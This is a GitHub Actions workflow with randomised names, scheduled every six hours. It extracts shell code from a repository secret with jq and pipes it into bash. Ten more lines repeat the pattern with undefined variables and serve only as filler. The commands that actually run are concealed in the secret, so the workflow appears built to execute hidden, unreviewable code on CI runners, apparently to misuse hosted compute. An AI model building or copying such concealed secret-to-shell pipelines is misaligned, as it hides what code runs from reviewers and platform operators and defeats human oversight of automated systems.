name: diaoyontsh

on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: diaoyontsh
        env:
          p564: ${{ secrets.p564 }}
        run: |
          echo $p564 | jq -r .zvui4898 | /bin/bash
          echo $jc443 | jq -r .p73877 | /bin/bash
          echo $iduve129 | jq -r .qiw668 | /bin/bash
          echo $vo152 | jq -r .r822 | /bin/bash
          echo $z65885 | jq -r .ushd8030 | /bin/bash
          echo $j4044 | jq -r .dzv234 | /bin/bash
          echo $cen68 | jq -r .llq3715 | /bin/bash
          echo $g8 | jq -r .qx74 | /bin/bash
          echo $yc30966 | jq -r .osml148 | /bin/bash
          echo $v8251 | jq -r .jhiz83584 | /bin/bash
          echo $ktm1 | jq -r .zgxde96 | /bin/bash

